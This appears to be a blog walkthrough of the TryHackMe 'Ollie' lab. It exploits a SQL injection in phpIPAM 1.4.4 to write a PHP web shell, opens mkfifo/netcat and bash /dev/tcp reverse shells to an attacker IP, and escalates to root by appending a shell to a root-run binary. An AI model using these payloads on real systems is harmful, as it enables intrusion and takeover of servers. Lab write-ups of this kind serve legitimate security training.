TryHackMe: Ollie

Today we will take a look at TryHackMe: Ollie. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sT -p- -T5 -vv -oN nmap/all_ports 10.10.86.146

1337 port Enumeration

Command: nc IP 1337

Yes, this is a simple chat correspondence. In the end, we get the necessary credential

I tried to log in to Ollie with SSH, but it didn’t work.

Let’s take a look at the website now.

It is a simple login page. Let’s enter with the credential we have.

I did research on phpIPAM. And it turned out that version 1.4.4 has a vulnerability to sql injection.

Let’s check here

Go to the Routing section

Go to the example in the Peer Name section. Click the Actions button and select Subnet mapping

Now let’s check the vulnerability.

Command: “union select @@version,2,user(),4 — -

It works. Now let’s create rce

Command: “ union select null,null,null,”<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/backdoor.php” — -

Reverse shell weed. But keep in mind that you need to encode the url as you type in the url section.

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20IP%204242%20%3E%2Ftmp%2Ff%0A

As soon as I received the reverse shell, I changed the user using the previous data.

Privilege Escalation

Command: find / -group ollie 2>/dev/null

There are some interesting results. But this was the most interesting.

After checking it, I saw that it works as root, and I used it to enter the reverse shell command.

Command: echo ‘bash -i >& /dev/tcp/IP/4444 0>&1’ >> /usr/bin/feedme

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Code for All Newsletter — January 2021

My Elastic Stack Journey

How to grant public access to all objects in the S3 bucket

Kubernetes Introduction for Beginners

Using Design Patterns in JavaScript -The Ultimate Guide

Using Design Patterns in JavaScript -The Ultimate Guide

How a Distributed Data Mesh can be both Data Centric and Event Driven

Android Clean Architecture — MVVM Part 1

Flutter Things that need to know Before Starting

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: Develpy

Backdoor — Hackthebox Walkthrough

HackTheBox Backdoor Write-Up

Backdoor logo.

TryHackMe: Vulnversity